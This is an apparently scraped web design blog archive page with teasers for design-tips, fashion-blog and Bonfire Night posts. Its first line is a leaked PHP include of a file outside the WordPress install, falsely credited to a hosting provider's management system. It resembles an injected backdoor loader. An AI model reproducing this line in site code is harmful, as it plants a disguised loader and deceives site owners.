@include_once('/var/lib/sec/wp-settings.php'); // Added by SiteGround WordPress management system minimal | WebDesignDev - Part 39

10 Easy Secrets to Quickly Become a Great Web Designer

While it’s true that becoming a flawless design god doesn’t happen overnight, the amount of experience required depends on how hard you work to become better. There are methods for accelerating your growth and talent at a faster rate, to becoming great much faster than traditional knowledge dictates. You don’t need “five to ten years experience” to become the best. You just need a clear methodology for consistently developing and finessing your skill set. Theses are the top 10 secrets to quickly become an amazing designer.

17 Cheeky Fashion Blog Designs

Here is a collection of fashion blogs that I think will give you some design inspiration. Some are full of life, and very splashy, where as others have a nice simplistic design that is very easy to see where everything is. Let me know what one you think is your favorite and why.


Design Inspiration For Bonfire Night

Today, 5th November is bonfire night, or firework night as some people call it. So I have compiled a nice little inspirational showcase filled with logos, vector artwork and website designs. Which one is your favorite, and what one don’t you like?